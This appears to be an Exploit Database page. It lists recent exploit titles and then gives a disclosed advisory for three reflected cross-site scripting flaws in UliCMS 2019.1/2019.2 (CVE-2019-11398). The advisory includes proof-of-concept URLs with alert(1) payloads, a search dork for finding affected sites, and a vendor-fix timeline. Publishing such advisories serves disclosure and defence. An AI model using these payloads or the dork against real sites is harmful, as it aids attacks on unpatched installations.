
10 changes to exploits/shellcodes Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC) QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC) LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret) ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit) WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion 74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User) Msvod 10 - Cross-Site Request Forgery (Change User Information) UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)
43 lines
No EOL
1.5 KiB
Text
43 lines
No EOL
1.5 KiB
Text
# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
|
|
# Google Dork: intext:"by UliCMS"
|
|
# Exploit Author: Kağan EĞLENCE
|
|
# Vendor Homepage: https://en.ulicms.de/
|
|
# Version: 2019.2 , 2019.1
|
|
# CVE : CVE-2019-11398
|
|
|
|
### Vulnerability 1
|
|
|
|
Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
|
|
Vulnerable File : /ulicms/admin/inc/loginform.php
|
|
Request Type: GET
|
|
Vulnerable Parameter : "go"
|
|
Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)
|
|
|
|
Result : <input type="hidden" name="go" value='asd' accesskey='X'
|
|
onclick='alert(1)'>
|
|
|
|
### Vulnerability 2
|
|
|
|
Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
|
|
Vulnerable File : /ulicms/admin/inc/registerform.php
|
|
Request Type: GET
|
|
Vulnerable Parameter : "go"
|
|
Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)
|
|
|
|
Result : <input type="hidden" name="go" value='asd' accesskey='X'
|
|
onclick='alert(1)'>
|
|
|
|
### Vulnerability 3 - Authenticated
|
|
|
|
Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
|
|
Request Type: GET
|
|
Vulnerable Parameter : "error"
|
|
Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
|
|
|
|
### History
|
|
=============
|
|
2019-04-13 Issue discovered
|
|
2019-04-13 Vendor contacted
|
|
2019-04-13 Vendor response and hotfix
|
|
2019-04-14 Vendor releases fixed versions
|
|
2019-04-22 Advisory release |